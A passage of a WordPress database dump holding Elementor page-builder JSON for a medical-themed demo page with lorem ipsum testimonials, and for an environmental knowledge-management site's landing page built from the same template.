hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ffe3375\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"deb0197\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient #4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3061,394,'_elementor_version','2.7.5'),(3062,394,'_elementor_template_type','wp-page'),(3066,395,'_wp_page_template','default'),(3067,395,'_elementor_edit_mode','builder'),(3068,395,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_247786.jpg\",\"id\":148},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3a3bcf4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\